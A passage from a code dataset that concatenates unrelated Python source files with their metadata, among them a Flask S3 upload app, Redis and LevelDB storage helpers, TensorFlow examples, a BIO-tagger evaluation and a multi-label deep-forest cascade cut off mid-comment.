boto.connect_s3()\n\t\tmybucket = conn.get_bucket('planit-impact-models') # Substitute in your own bucket name\n\t\tk = Key(mybucket)\n\t\tk.key = self.name\n\t\tk.set_contents_from_filename(self.localpath)\n\t\tconn.close()\n\t\tself.s3_url = 'https://s3.amazonaws.com/planit-impact-models/'+self.name\n\n#----------------------------------------\n# controllers\n#----------------------------------------\n\n@app.route(\"/\")\n@app.route(\"/index\")\n@app.route(\"/index.html\")\ndef index():\n return render_template('index.html')\n\n@app.route(\"/about\")\n@app.route(\"/about.html\")\ndef about():\n return render_template('about.html')\n\n@app.route(\"/features\")\n@app.route(\"/features.html\")\ndef features():\n return render_template('features.html')\n\n@app.route(\"/howitworks\")\n@app.route(\"/howitworks.html\")\ndef howitworks():\n return render_template('howitworks.html')\n\n@app.route(\"/demo\", methods=['GET', 'POST'])\n@app.route(\"/demo.html\", methods=['GET', 'POST'])\ndef demo():\n\tif request.method == 'POST':\n\t\tfile = request.files['file']\n\t\tif '.kmz' in file.filename:\n\t\t\tfilename = secure_filename(file.filename)\n\t\t\tfilepath = '/tmp/'+filename\n\t\t\tfile.save(filepath)\n\t\t\tdescription = request.form['description']\n\n\t\t\tmodel = ThreeDeeModel(filename,description,filepath)\n\t\t\tmodel.get_lat_lon_from_model()\n\t\t\tmodel.upload_to_s3()\n\n\t\t\tdb.session.add(model)\n\t\t\tdb.session.commit()\n\t\telse:\t \n\t\t\tflash('Only kmz files allowed.') # Still needs a template to make use of this.\n\t\n\tall_models = ThreeDeeModel.query.all()\n\n\treturn render_template('demo.html', all_models=all_models)\n\n@app.route(\"//report/explore\")\ndef report(model_name):\n\tmodel = ThreeDeeModel.query.filter_by(name=model_name).first()\n\treturn render_template('explore.html', model=model)\n\nif __name__ == \"__main__\":\n app.run()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"308383090","text":"# -*- coding: utf-8 -*-\n# MegEngine is Licensed under the Apache License, Version 2.0 (the \"License\")\n#\n# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nDEFAULT_BRANCH_NAME = \"master\"\nHUBCONF = \"hubconf.py\"\nHUBDEPENDENCY = \"dependencies\"\nDEFAULT_GIT_HOST = \"github.com\"\nENV_MGE_HOME = \"MGE_HOME\"\nENV_XDG_CACHE_HOME = \"XDG_CACHE_HOME\"\nDEFAULT_CACHE_DIR = \"~/.cache\"\nDEFAULT_PROTOCOL = \"HTTPS\"\nHTTP_READ_TIMEOUT = 120\n","sub_path":"imperative/python/megengine/hub/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"564346683","text":"from tkinter import *\nimport random\n\ndef click():\n num = random.randint(1,6)\n answer[\"text\"] = num\n\nwindow = Tk()\nwindow.title(\"Dice - Dice\")\nwindow.geometry(\"100x120\")\n\nbutton1 = Button(text = \"Test your luke!\", command = click)\nbutton1.place(x = 20, y = 45, width = 80, height = 20)\n\nanswer = Message(text = \"\")\nanswer.place(x = 40, y = 80, width = 40, height = 20)\n\nwindow.mainloop()","sub_path":"Ejercicio_N125.py","file_name":"Ejercicio_N125.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"171623122","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 19 22:04:58 2021\n\n@author: Amund\n\"\"\"\nimport string\ndef getAvailableLetters(lettersGuessed):\n '''\n lettersGuessed: list, what letters have been guessed so far\n returns: string, comprised of letters that represents what letters have not\n yet been guessed.\n '''\n alp = string.ascii_lowercase\n available = \"\"\n for letter in alp:\n if letter not in lettersGuessed:\n available += letter\n return available\nlettersGuessed = ['e', 'i', 'k', 'p', 'r', 's']\nprint(getAvailableLetters(lettersGuessed))\n \n \n\n ","sub_path":"EDx Python/Problem Sets/U3PS3-Problem3NotOneLine.py","file_name":"U3PS3-Problem3NotOneLine.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"266067376","text":"import smtplib\nfrom email.mime.text import MIMEText\nfrom email.header import Header\nimport difflib\nimport time\nimport os\n\n\nclass LogFiff(object):\n\n def __init__(self, path, nowtime):\n self.path = path\n self.nowtime = nowtime\n\n def read_file(self):\n path1 = self.path + '/correct_log/'\n path2 = self.path + '/to_diff_log/'\n text_a = open(path1 + os.listdir(path1)[0]).readlines()\n text_b = open(path2 + os.listdir(path2)[0]).readlines()\n diff_rs = difflib.HtmlDiff()\n diff_result = diff_rs.make_file(text_a, text_b, context=True)\n return diff_result\n\n def send_email(self):\n sender = 'sender@qq.com'\n password = 'pwd'\n receivers = 'receiver@qq.com'\n mail_msg = LogFiff.read_file(self)\n with open(self.nowtime + '_result.html', 'w') as writein:\n writein.write(mail_msg)\n message = MIMEText(mail_msg, 'html', 'utf-8')\n subject = self.nowtime + '_log测试'\n message['Subject'] = Header(subject, 'utf-8')\n message['From'] = Header('python_autotest', 'utf-8')\n\n try:\n smtpObj = smtplib.SMTP_SSL('smtp.qq.com', 465)\n smtpObj.login(sender, password)\n smtpObj.sendmail(sender, receivers, message.as_string())\n smtpObj.quit()\n except smtplib.SMTPException:\n print('error')\n\n\nif __name__ == '__main__':\n path = os.getcwd()\n nowtime = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n s = LogFiff(path, nowtime)\n s.send_email()","sub_path":"Diff_Log/android_log.py","file_name":"android_log.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"286382350","text":"import config\n\nclass View(object):\n\tdef __init__(self,path):\n\t\tself.__path = path\n\t\t\n\tdef render(self,vardict):\n\t\ttemplate_type = config.config['view']['template_type']\n\t\ttemplate_folder = 'app/template'\n\t\ttemplate_filepath = '%s.html'%self.__path \n\t\tif 'mako' == template_type:\n\t\t\tfrom mako.template import Template\n\t\t\tfrom mako.lookup import TemplateLookup\n\t\t\tmylookup = TemplateLookup(\n\t\t\t\tdirectories=[ template_folder ],\n\t\t\t\tinput_encoding='utf-8',\n\t\t\t\toutput_encoding='utf-8',\n\t\t\t\tencoding_errors='replace'\n\t\t\t)\n\t\t\tmytemplate = mylookup.get_template( template_filepath )\n\t\t\treturn mytemplate.render_unicode(**vardict)\n\t\telif 'jinja2' == template_type:\n\t\t\timport jinja2\n\t\t\tenv = jinja2.Environment(loader = jinja2.FileSystemLoader('app/template'))\n\t\t\ttemplate = env.get_template(template_filepath)\n\t\t\t\n\t\t\tdef do(a):\n\t\t\t\treturn ''\n\t\t\tvardict['do'] = do\n\t\t\treturn template.render(**vardict)\n","sub_path":"drape/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"629040637","text":"#!/usr/bin/python2\n# -*- coding: utf-8 -*-\n\nimport redis\n# https://plyvel.readthedocs.org\nimport plyvel as leveldb\nimport os\nimport ast\nimport time\nimport simplejson as json\n\nimport common\nimport logging\nimport config\nfrom itertools import islice\n\n\"\"\"\nRedis DB szablon:\n- hash initv: dane chwilowe z czujnikow\n- kanał nodes(domyślnie) - pubsub\n- hash status: dane chwilowe przekaźników\n\"\"\"\n\n\nclass redisdb():\n\n \"\"\"Temporary data\"\"\"\n def __init__(self, debug=True):\n self.initdb()\n self.debug = debug\n\n def initdb(self, host=\"localhost\", port=6379):\n self.rdb = redis.Redis(host, port)\n\n def pubsub(self, data, channel='nodes'):\n if data:\n data_str = json.dumps(data)\n self.rdb.set(\"initv\", data) # name, value\n self.rdb.publish(channel, data) # channel, value\n if self.debug:\n logging.debug('Data publish on channel')\n logging.debug('Submit init values')\n\n def setStatus(self, msg):\n \"\"\"{\"name\": \"relaynode\", \"status\": 0, \"cmd\": 1}\"\"\"\n jmsg = json.loads(msg)\n self.rdb.hset('status', jmsg['name'] + \"_\" + jmsg['cmd'], str(msg))\n\n def getStatus(self, nodename):\n return self.rdb.hget(\"status\", nodename)\n\n\nclass history():\n\n '''Store data in base for future use ie. graphs'''\n def __init__(self, path, dbname):\n self.path = path\n self.dbname = dbname\n #self.create_db = create_db\n\n dirname = self.path + \"/\" + self.dbname\n\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n\n self.lvldb = leveldb.DB(\"%s/%s\" % (self.path,\n self.dbname),\n create_if_missing=True)\n self.dbconnected = True\n\n def is_connected(self):\n return self.dbconnected\n\n def get(self, nodename, timerange):\n\n ranges = {'1h' : 3600,\n '8h' : 28000,\n 'day' : 86400,\n '2d': 172800,\n '3d': 259200,\n '4d': 345600,\n '5d': 432000,\n 'week' : 604800,\n '2w' : (2 * 604800),\n '3w' : (3 * 604800),\n 'month' : 2592000,\n '2m' : (5184000),\n '3m' : (7776000),\n '4m' : (7776000 + 2592000),\n '5m' : (7776000 + 2592000 + 2592000),\n '6m' : (15552000),\n '7m' : (15552000 + 2592000),\n '8m' : (15552000 + 2592000 + 2592000),\n '9m' : (15552000 + 2592000 + 2592000 + 2592000),\n 'year' : (31104000)}\n\n if self.dbconnected:\n data = []\n ts = int(time.time())\n start_key = '%s-%s' % (nodename, ts-ranges[timerange])\n stop_key = '%s-%s' % (nodename, ts)\n \n iterator = self.lvldb.iterator(start=(start_key).encode('ascii'),\n stop=(stop_key).encode('ascii'),\n include_start=True,\n include_stop=True)\n \n data = [value for key, value in iterator]\n \n iterator.close()\n if (ts - ranges[timerange]) > (ts - 604900):\n #print 'week'\n return data\n elif(ts - ranges[timerange]) < (ts - 604900) and (ts - ranges[timerange]) > (ts - 2593000):\n data_filtered = [value for value in (islice(data,0,len(data), 10))]\n #print 'month - 3month'\n return data_filtered\n elif (ts - ranges[timerange]) < (ts - 2593000):\n #print 'above 3month'\n data_filtered = [value for value in (islice(data,0,len(data), 100))]\n return data_filtered\n def put(self, key, value):\n if self.dbconnected:\n self.lvldb.put(key, value)\n \n \n def pritndb(self,node):\n \n if self.dbconnected:\n imput = node\n file = open(\"/mnt/data/\"+imput+\"_data_node.log\", \"w\")\n for key, value in self.lvldb.iterator(prefix=imput):\n file.write (value)\n file.write(\"\\n\")\n file.close() \n \n return \"all database dumped to: /mnt/data/....data_node.log node: %s\" % imput\n \n def closeconnectdb(self):\n return self.lvldb.close()\n \n def get_toJSON(self, nodename, sensor, timerange='1h'):\n data = []\n if self.dbconnected:\n values = self.get(nodename, timerange)\n # milliseconds for JavaScript\n data = ([[ast.literal_eval(v)['timestamp'] * 1000,ast.literal_eval(v)[sensor]] for (v) in values])\n \n return data\n \n \n def get_toJSON_last(self, nodename, sensor, timerange='day'):\n data = []\n if self.dbconnected:\n values = self.get(nodename, timerange)\n # milliseconds for JavaScript\n #data = [[ast.literal_eval(v)['timestamp'] *1000, ast.literal_eval(v)[sensor]] for v in values]\n data = [ ast.literal_eval(v)[sensor] for (v) in values]\n \n return data[-1], data[0]\n","sub_path":"sensnode/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":5296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350149807","text":"import sys\nimport time\nimport logging\n\n# https://github.com/gorakhargosh/watchdog#example-api-usage\nfrom watchdog.observers import Observer\nfrom watchdog.events import LoggingEventHandler\n\nfrom subprocess import call\n\nclass PyHandler(LoggingEventHandler):\n def dispatch(self, event):\n if event.src_path.lower().endswith('.py'):\n print(\"(compile.py) recompiling...\")\n call([\"python\", \"compile.py\"])\n\n\nclass EvHandler(LoggingEventHandler):\n def dispatch(self, event):\n print(\"recompiling...\")\n call([\"python\", \"compile.py\"])\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n\npath = \"./templates\"\n\nevent_handler = EvHandler()\n\nobserver = Observer()\nobserver.schedule(event_handler, \"./templates\", recursive=True)\nobserver.schedule(PyHandler(), '.', recursive=False)\n#observer.schedule(event_handler, '../tokens', recursive=True)\nobserver.schedule(event_handler, '../entities', recursive=True)\n\n\nobserver.start()\ntry:\n while True:\n time.sleep(1)\nexcept KeyboardInterrupt:\n observer.stop()\nobserver.join()","sub_path":"site/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"470680726","text":"# import necessary packages\nimport matplotlib\n\nmatplotlib.use(\"Agg\")\nfrom keras.utils import to_categorical\nimport numpy as np\nimport argparse\nimport cv2\nimport os\nfrom keras.models import load_model\nimport random\n\n# handle command line arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\", \"--dataset\", required=True,\n help=\"path to input dataset (i.e., directory of images)\")\nargs = ap.parse_args()\n\n# initial parameters\nbatch_size = 64\nimg_dims = (96, 96, 3)\n\nfinal_images = []\nfinal_labels = []\n\n# get images\nwoman_paths = os.path.join(args.dataset, \"female_names.txt\")\nman_paths = os.path.join(args.dataset, \"male_names.txt\")\n\nwoman_list = [line.rstrip('\\n') for line in open(woman_paths)]\nwoman_labels = [1]*len(woman_list)\nman_list = [line.rstrip('\\n') for line in open(man_paths)]\nman_labels = [0]*len(man_list)\n\nimage_paths = woman_list + man_list\nlabels = woman_labels + man_labels\n\ndata = list(zip(image_paths,labels))\nrandom.shuffle(data)\n\nimage_paths = [point[0] for point in data]\nlabels = [point[1] for point in data]\n\nfor idx, image in enumerate(image_paths):\n folder_name = image.split('_')\n if len(folder_name) == 3:\n id_name = folder_name[0] + '_' + folder_name[1]\n elif len(folder_name) == 4:\n id_name = folder_name[0] + '_' + folder_name[1] + '_' + folder_name[2]\n else:\n continue\n image_path = os.path.join(args.dataset, 'lfw', id_name, image)\n img = cv2.imread(image_path)\n if img is None:\n continue\n img = cv2.resize(img, (img_dims[0], img_dims[1]))\n final_images.append(img)\n label = labels[idx]\n final_labels.append(label)\n\n\n# pre-processing\nfinal_images = np.array(final_images, dtype=\"float\") / 255.0\nfinal_labels = np.array(final_labels)\n\nprint(final_labels.shape)\n\ntrainX = final_images\ntrainY = final_labels\n\ntrainY = to_categorical(trainY, num_classes=2)\n\nmodel_path = '/home/giancarlo/Documents/Gender-test/gender-detection-keras/custom_final.model'\nmodel = load_model(model_path)\n\nH = model.evaluate(x=trainX, y=trainY, batch_size = batch_size,verbose=1)\nprint('Loss: ', H[0])\nprint('Accuracy: ', H[1])\n","sub_path":"test_LFW.py","file_name":"test_LFW.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"611300338","text":"class Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n # Op1: Hashmap\n dic = {}\n for num in nums:\n dic[num] = dic[num] + 1 if num in dic else 1\n ans = []\n for num in nums:\n if dic[num] == 1:\n ans.append(num)\n return ans\n\n\nnums = [1, 2, 1, 3, 2, 5]\ntest = Solution()\nprint(test.singleNumber(nums))","sub_path":"python/260 Single Number III.py","file_name":"260 Single Number III.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421538286","text":"# Lab 2 Linear Regression\r\nimport tensorflow as tf\r\n\r\nx_train = [1, 2, 3]#데이터의 X값\r\ny_train = [1, 2, 3]#데이터의 Y값\r\n\r\nW = tf.Variable(tf.random_normal([1]), name=\"weight\")#Variable방식으로 노드를 생성 Variable은 일반 변수와는 달리 tensorflow가 이용하는 변수 그리고 무작위의 값을 준다.\r\nb = tf.Variable(tf.random_normal([1]), name=\"bias\")#Variable방식으로 노드를 생성 Variable은 일반 변수와는 달리 tensorflow가 이용하는 변수 그리고 무작위의 값을 준다.\r\n\r\nhypothesis = x_train * W + b#가설의 값을 X * W + b로 한다.\r\n\r\ncost = tf.reduce_mean(tf.square(hypothesis - y_train))#cost function의 값을 수식에 맞게 설정한다.\r\n\r\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01)\r\ntrain = optimizer.minimize(cost)\r\n\r\n\r\nsess = tf.Session()#세션을 만든다.\r\nsess.run(tf.global_variables_initializer())#Variable을 사용해 실행하기 전에는 반드시 global_variables_initializer를 실행해줘야 한다.\r\n\r\nfor step in range(2001):#2000번정도 실행한다.\r\n sess.run(train)#train노드를 실행한다.\r\n if(step % 20 == 0):\r\n print(step, sess.run(cost), sess.run(W), sess.run(b))","sub_path":"Ch.3/Example1.py","file_name":"Example1.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"632374320","text":"#!/usr/bin/env python3\n# encoding: utf-8\nimport logging\nimport signal\nimport asyncio\nfrom pyupcn.tcpcl import TCPCLServer, logger\n\n\nDEFAULT_INCOMING_EID = \"dtn:1\"\nBIND_TO = (\"127.0.0.1\", 42420)\n\n\nasync def listen(loop):\n async with TCPCLServer(DEFAULT_INCOMING_EID, *BIND_TO, loop=loop) as sink:\n loop.add_signal_handler(signal.SIGINT, sink.close)\n await sink.wait_closed()\n loop.remove_signal_handler(signal.SIGINT)\n\n\n# Enable logging on stdout\nlogger.setLevel(logging.DEBUG)\nconsole = logging.StreamHandler()\nconsole.setLevel(logger.level)\nlogger.addHandler(console)\n\n# Bootstrap event loop\nloop = asyncio.get_event_loop()\ntry:\n loop.run_until_complete(listen(loop))\nfinally:\n loop.close()\n","sub_path":"tools/cla/tcpcl_sink.py","file_name":"tcpcl_sink.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"502891638","text":"import os\nimport sys\nfrom pyDANDIA import metadata\n\ndef reset_red_status_for_stage(red_dir,stage_number):\n \"\"\"Function to reset the reduction status table entries for a given stage.\n Note that the status for all images will be set to zero (process) except\n for entries that were flagged as -1 (do not process) by the PREVIOUS\n stage\"\"\"\n\n reduction_metadata = metadata.MetaData()\n reduction_metadata.load_all_metadata(red_dir, 'pyDANDIA_metadata.fits')\n\n stage_name = 'STAGE_'+str(stage_number)\n\n image_list = reduction_metadata.reduction_status[1]['IMAGES'].data\n image_status = reduction_metadata.reduction_status[1]['STAGE_'+str(stage_number-1)].data\n\n for i,image in enumerate(image_list):\n\n if '-1' not in image_status[i]:\n reduction_metadata.update_a_cell_to_layer('reduction_status', i, stage_name, '0')\n\n reduction_metadata.save_updated_metadata(red_dir,'pyDANDIA_metadata.fits')\n\nif __name__ == '__main__':\n if len(sys.argv) == 1:\n red_dir = input('Please enter the path to the reduction directory: ')\n stage_number = input('Please enter the stage number to reset: ')\n else:\n red_dir = sys.argv[1]\n stage_number = sys.argv[2]\n\n stage_number = int(stage_number)\n\n reset_red_status_for_stage(red_dir,stage_number)\n","sub_path":"pyDANDIA/reset_stage_metadata.py","file_name":"reset_stage_metadata.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18064946","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/07/16 8:23\n# @Author : 于博文\n# @Email : yubowen.njust@gmail.com\n# @File : Read-TFRecord-Example.py\n# @Software: PyCharm\n\nimport tensorflow as tf\n\n# 读取文件。\nreader = tf.TFRecordReader()\nfilename_queue = tf.train.string_input_producer([\"Records/output.tfrecords\"])\n_,serialized_example = reader.read(filename_queue)\n\n# 解析读取的样例。\nfeatures = tf.parse_single_example(\n serialized_example,\n features={\n 'image_raw':tf.FixedLenFeature([],tf.string),\n 'pixels':tf.FixedLenFeature([],tf.int64),\n 'label':tf.FixedLenFeature([],tf.int64)\n })\n\nimages = tf.decode_raw(features['image_raw'],tf.uint8)\nlabels = tf.cast(features['label'],tf.int32)\npixels = tf.cast(features['pixels'],tf.int32)\n\nsess = tf.Session()\n\n# 启动多线程处理输入数据。\ncoord = tf.train.Coordinator()\nthreads = tf.train.start_queue_runners(sess=sess,coord=coord)\n\nfor i in range(500):\n image, label, pixel = sess.run([images, labels, pixels])\n print(i,image,label,pixel)","sub_path":"1.tensorflow/TensorFlow实战Google深度学习框架/TFRecord/Read-TFRecord-Example.py","file_name":"Read-TFRecord-Example.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312145407","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom keras_contrib.layers import CRF\nfrom keras_contrib.losses import crf_loss\nfrom keras_contrib.metrics import crf_viterbi_accuracy\nfrom keras.models import load_model\n# To load the model\ncustom_objects={'CRF': CRF,'crf_loss':crf_loss,'crf_viterbi_accuracy':crf_viterbi_accuracy}\n# To load a persisted model that uses the CRF layer \nBIO_TAGGER = load_model('_BIO_TAGGER.h5', custom_objects = custom_objects)\n\n\n# In[2]:\n\n\nfrom nltk import word_tokenize\n\n\n# In[3]:\n\n\nimport pickle\n\nwith open('_word_to_index.pickle', 'rb') as f1:\n word_to_index = pickle.load(f1)\n \nwith open('_index_to_tag.pickle', 'rb') as f2:\n index_to_tag = pickle.load(f2) \n\nwith open('X_test.pickle', 'rb') as f3:\n X_test = pickle.load(f3) \n\nwith open('y_test.pickle', 'rb') as f4:\n y_test = pickle.load(f4) \n\nwith open('_index_to_word.pickle', 'rb') as f5:\n index_to_word = pickle.load(f5)\n\n\n# In[4]:\n\n\nfrom keras.utils import np_utils\ny_test2 = np_utils.to_categorical(y_test)\n\n\n# In[5]:\n\n\nimport numpy as np\n\n\n# In[6]:\n\n\ni=3\np=BIO_TAGGER.predict(np.array([X_test[i]]))\np=np.argmax(p, axis=-1)\ntrue = np.argmax(y_test2[i],-1)\n\nfor w, t, pred in zip(X_test[i],true, p[0]):\n if t != 0: # PAD값은 제외함.\n print(\"{:17}: {:30} {}\".format(index_to_word[w], index_to_tag[t], index_to_tag[pred]))\n\n\n# In[7]:\n\n\ntrue\n\n\n# In[8]:\n\n\nfor w, t, pred in zip(X_test[i],true, p[0]):\n if t != 0: # PAD값은 제외함.\n print(\"{:17}: {:30} {}\".format(index_to_word[w], index_to_tag[t], t))\n\n\n# In[9]:\n\n\n#from keras.utils import np_utils\ny_test2 = np_utils.to_categorical(y_test)\nprint(\"\\n 테스트 정확도: %.4f\" % (BIO_TAGGER.evaluate(X_test, y_test2)[1]))\n\n\n# In[10]:\n\n\nCheck = []\nfor i in range(len(X_test)) : \n Check.append([])\n p=BIO_TAGGER.predict(np.array([X_test[i]]))\n p=np.argmax(p, axis=-1)\n true = np.argmax(y_test2[i],-1)\n for j in range(len(true)) :\n if true[j] != 0:\n if p[0][j] == true[j] :\n Check[i].append(1)\n else :\n Check[i].append(0)\n\n\n# In[11]:\n\n\ntrue\n\n\n# In[12]:\n\n\nRatio_right = []\nRatio_wrong = []\n\n\n# In[13]:\n\n\nfor C in Check :\n count=0\n for r in C :\n if r == 1 :\n count += 1\n ratio = count/len(C)\n Ratio_right.append(ratio)\n Ratio_wrong.append(1-ratio)\n\n\n# In[14]:\n\n\nlen(C)\n\n\n# In[15]:\n\n\nfrom numpy import array\nfrom matplotlib import pyplot\n\ndata1 = array(Ratio_right)\ndata2 = array(Ratio_wrong)\npyplot.bar(range(len(data1)), data1, color = \"#0000FF\")\npyplot.bar(range(len(data2)), data2, bottom=data1, color = \"#FF0000\")\n\n\n# In[16]:\n\n\navg2 = np.mean(data1)\nprint(avg2)\n\n\n# In[17]:\n\n\nCheck_1 = []\nfor i in range(len(X_test)) : \n Check_1.append([])\n p=BIO_TAGGER.predict(np.array([X_test[i]]))\n p=np.argmax(p, axis=-1)\n true = np.argmax(y_test2[i],-1)\n for j in range(len(true)) :\n if true[j] != 0 and true[j] != 22: # 첫번째 조건은 패딩 부분 제외, 두번째 조건은 O가 아닌 것들만\n if p[0][j] == true[j] :\n Check_1[i].append(1)\n else :\n Check_1[i].append(0)\n\n\n# In[18]:\n\n\nRatio_right_1 = []\nRatio_wrong_1 = []\n\n\n# In[19]:\n\n\nfor I in range(len(Check_1)) :\n if len(Check_1[i]) == 0 :\n print(i)\n\n\n# In[24]:\n\n\nCheck_1\n\n\n# In[20]:\n\n\nfor C in Check_1 :\n count_1=0\n for r in C :\n if r == 1 :\n count_1 += 1\n if len(C)!=0:\n ratio_1 = count_1/len(C)\n Ratio_right_1.append(ratio_1)\n Ratio_wrong_1.append(1-ratio_1)\n\n\n# In[21]:\n\n\nlen(C)\n\n\n# In[22]:\n\n\nfrom numpy import array\nfrom matplotlib import pyplot\n\ndata1_1 = array(Ratio_right_1)\ndata2_1 = array(Ratio_wrong_1)\npyplot.bar(range(len(data1_1)), data1_1, color = \"#0000FF\")\npyplot.bar(range(len(data2_1)), data2_1, bottom=data1_1, color = \"#FF0000\")\n\n\n# In[23]:\n\n\navg = np.mean(data1_1)\nprint(avg)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"NER/BIO_ACCURACY_VISUALIZATION.py","file_name":"BIO_ACCURACY_VISUALIZATION.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"411030540","text":"\"\"\"\n树级联成森林\n森林最大层数:20\n森林数:2\n\"\"\"\nfrom sklearn.cross_validation import KFold\n# from sklearn.model_selection import KFold\n\nfrom sklearn.model_selection import train_test_split\nfrom .measure import *\nfrom .warpper import KfoldWarpper\n\n\nclass Cascade:\n # 本实验将最大层数(T)设置为20\n def __init__(self, dataname, max_layer=20, num_forests=4, n_fold=5, step=3):\n \"\"\"\n :param dataname: 数据集名称\n :param max_layer: 森林最大层数,设为20\n :param num_forests: 每一层的森林数量,设为2\n :param n_fold: 每一层交叉验证倍数,设为5\n :param step: 迭代次数,设为3\n \"\"\"\n self.max_layer = max_layer\n self.n_fold = n_fold\n self.step = step\n self.layer_list = []\n self.num_forests = num_forests\n self.dataname = dataname\n self.eta = []\n self.model = []\n\n # 针对六个多标签指标(用supervise表示),计算置信度,公式如论文中的表2所示,结果用alpha表示\n # P是预测值矩阵\n def compute_confidence(self, supervise, P):\n \"\"\"\n :param supervise: string (e.g. \"hamming loss\", \"one-error\"),即指标\n :param P: array, whose shape is (num_samples, num_labels)\n :return alpha: array, whose shape is :\n (num_samples, ) when supervise is instance-based measure,\n and (num_labels, ) when supervise is label-based measure\n \"\"\"\n m, l = P.shape[0], P.shape[1]\n print(\"计算置信度,当前层的实例数、标签数:\", m, l)\n if supervise == \"hamming loss\":\n alpha = np.sum(np.abs(P - 0.5) + 0.5, axis=0) / m\n elif supervise == \"one-error\":\n alpha = np.max(P, axis=1)\n elif supervise == \"ranking loss\" or supervise == \"average precision\":\n forward_prod = np.sort(P, axis=1)\n backward_prod = 1 - forward_prod\n for j in range(1, l, 1):\n forward_prod[:, j] = forward_prod[:, j - 1] * P[:, j]\n for j in range(l - 2, -1, -1):\n backward_prod[:, j] = backward_prod[:, j + 1] * (1 - P[:, j])\n alpha = forward_prod[:, l - 1] + backward_prod[:, 0]\n for j in range(l - 1):\n alpha += forward_prod[:, j] * backward_prod[:, j + 1]\n elif supervise == \"coverage\":\n backward_prod = 1 - np.sort(P, axis=1)\n for j in range(l - 2, -1, -1):\n backward_prod[:, j] = backward_prod[:, j + 1] * (1 - P[:, j])\n alpha = backward_prod[:, 0]\n for j in range(l - 1):\n alpha += j * P[:, j] * backward_prod[:, j + 1]\n alpha = 1 - alpha / l\n elif supervise == \"macro_auc\":\n forward_prod = np.sort(P, axis=0)\n backward_prod = 1 - P.copy()\n for i in range(1, m, 1):\n forward_prod[i, :] = forward_prod[i - 1, :] * P[i, :]\n for i in range(m - 2, -1, -1):\n backward_prod[i, :] = backward_prod[i + 1, :] * (1 - P[i, :])\n alpha = forward_prod[m - 1, :] + backward_prod[0, :]\n for i in range(m - 1):\n alpha += forward_prod[i, :] * backward_prod[i + 1, :]\n return alpha\n\n # 在第一层中,每个森林中有40棵树,然后比上一层增加20棵树,直到树数达到100\n # 形参中指定了参数默认值,但是调用时以实参为准\n def train(self, train_data_raw, train_label_raw, supervise, n_estimators=40):\n \"\"\"\n :param train_data_raw: array, whose shape is (num_samples, num_features)\n :param train_label_raw: array, whose shape is (num_samples, num_labels)\n :param supervise: string, (e.g. \"hamming loss\", \"one-error\")\n :param n_estimators: int, 每个森林块中树的数量,本实验中设为40\n \"\"\"\n # 将参数中的训练集、对应的标签集复制一份\n train_data = train_data_raw.copy()\n train_label = train_label_raw.copy()\n # 标签数取的是训练标签集的列数\n self.num_labels = train_label.shape[1]\n # 初始化指标值,不同的指标初值不同\n best_value = init_supervise(supervise)\n # 统计为改进的层数,若近三层未改进,则停止训练\n bad = 0\n # 初始化一个和train_label矩阵一样规模的矩阵,但元素不是空\n best_train_prob = np.empty(train_label.shape)\n # 初始化一个三维矩阵:每层的森林数、实例数、标签数\n best_concatenate_prob = np.empty([self.num_forests, train_data.shape[0], self.num_labels])\n\n # max_layer = 20,遍历森林的每一层,逐层训练\n for layer_index in range(self.max_layer):\n print(\"训练MLDF模型第\" + str(layer_index) + \"层ing\")\n\n # K折交叉验证:用sklearn.cross_validation 求kf,此包已经弃用,但有n_folds参数\n # 将训练数据集划分len(train_label)个互斥子集,\n # 